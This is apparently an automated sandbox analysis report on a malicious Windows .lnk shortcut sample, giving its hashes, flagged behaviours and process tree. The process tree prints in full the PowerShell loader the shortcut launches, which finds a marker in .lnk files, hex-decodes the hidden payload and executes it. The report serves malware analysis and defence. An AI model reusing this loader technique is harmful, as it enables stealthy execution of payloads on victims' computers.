Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-04-2024 07:10
Static task
static1
Behavioral task
behavioral1
Sample
85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
Resource
win10v2004-20240226-en
General
-
Target
85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
-
Size
5.4MB
-
MD5
85e44c6e99f5f4043fc2c993b6fa633b
-
SHA1
21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
-
SHA256
62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
-
SHA512
7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff
-
SSDEEP
1536:U9I0i/p6qP3NUUSQryt/H7brkIYtppz5h5Z5S5k5+5L5XEYEpEz5d5zE/EVE/E/A:U94
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2536 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1548 wrote to memory of 2536 1548 cmd.exe powershell.exe PID 1548 wrote to memory of 2536 1548 cmd.exe powershell.exe PID 1548 wrote to memory of 2536 1548 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2536-38-0x000000001B1B0000-0x000000001B492000-memory.dmpFilesize
2.9MB
-
memory/2536-39-0x0000000002380000-0x0000000002388000-memory.dmpFilesize
32KB
-
memory/2536-40-0x000007FEF4F50000-0x000007FEF58ED000-memory.dmpFilesize
9.6MB
-
memory/2536-41-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/2536-42-0x000007FEF4F50000-0x000007FEF58ED000-memory.dmpFilesize
9.6MB
-
memory/2536-45-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/2536-44-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/2536-43-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/2536-46-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/2536-47-0x000007FEF4F50000-0x000007FEF58ED000-memory.dmpFilesize
9.6MB